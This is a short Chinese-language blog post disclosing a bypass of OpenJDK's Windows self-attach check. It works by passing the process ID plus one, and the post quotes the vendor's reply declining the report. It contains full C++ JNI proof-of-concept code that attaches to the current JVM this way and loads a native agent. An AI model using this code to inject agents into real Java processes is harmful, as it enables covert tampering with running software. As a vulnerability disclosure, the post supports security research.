[2024]HotSpotVirtualMachine.java self attach check function Vulnerabilitie huoji java 2024-02-22 253 次浏览 0 次点赞 HotSpotVirtualMachine.java https://github.com/openjdk/jdk/blob/4b9ec8245187a2eaccc711a6e5d3d4915dd022c9/src/jdk.attach/share/classes/sun/tools/attach/HotSpotVirtualMachine.java#L49 ```cpp if (!ALLOW_ATTACH_SELF && (pid == 0 || pid == CURRENT_PID)) { throw new IOException("Can not attach to current VM"); } ``` 在 Windows 中,pid 必须是 4 的倍数,4 以外的倍数将向下舍入其平均值,如果当前 pid 是 8,但仍可输入 9、10 或 11,则会绕过自连接检查: ```cpp virtualMachineClass.cs_call( "attach", "(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine;", std::to_string(targetPid + 1).c_str()); targetpid + 1 success bypass check, full code: auto JavaAttach(const size_t pid, std::string modulePathA, std::string attachedAgentPath) -> bool { bool isSuccess = false; auto targetPid = pid; try { #ifdef _TEST printf("start attach ,path: %s \n", modulePathA.c_str()); #endif jni::Vm vm(modulePathA.c_str()); jni::Class virtualMachineClass = jni::Class("com/sun/tools/attach/VirtualMachine"); if (virtualMachineClass.isNull()) { throw std::exception("virtualMachineClass is null"); } #ifdef _TEST printf("look up the virtualmachine start attach... \n"); #endif jni::Object virtualMachineObject = virtualMachineClass.cs_call( "attach", "(Ljava/lang/String;)Lcom/sun/tools/attach/VirtualMachine;", std::to_string(targetPid + 1).c_str()); if (virtualMachineObject.isNull()) { throw std::exception("virtualMachineObject is null"); } virtualMachineClass.cs_dynamic_call( virtualMachineObject, "loadAgentPath", "(Ljava/lang/String;)V", attachedAgentPath.c_str()); isSuccess = true; #ifdef _TEST printf("success \n"); #endif // _TEST } catch (const std::exception &e) { #ifdef _TEST printf("Exception %s \n", e.what()); #endif // _TEST } return isSuccess; } ``` 汇报给官方后,官方回应: ```cpp Hello, It is true that the code does not compensate for non-factor of four PIDs on Windows. However, one would need access/privileges to run in the debugger or use JNI to deliver an invalid PID as the OS enforces the limitation. With this level of access any attacker could do far worse things to the Java process. We would like to decline this issue. Please let us know if you view it differently and please provide more detail to support the case. ``` 本文由 huoji 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。 点赞 0
还不快抢沙发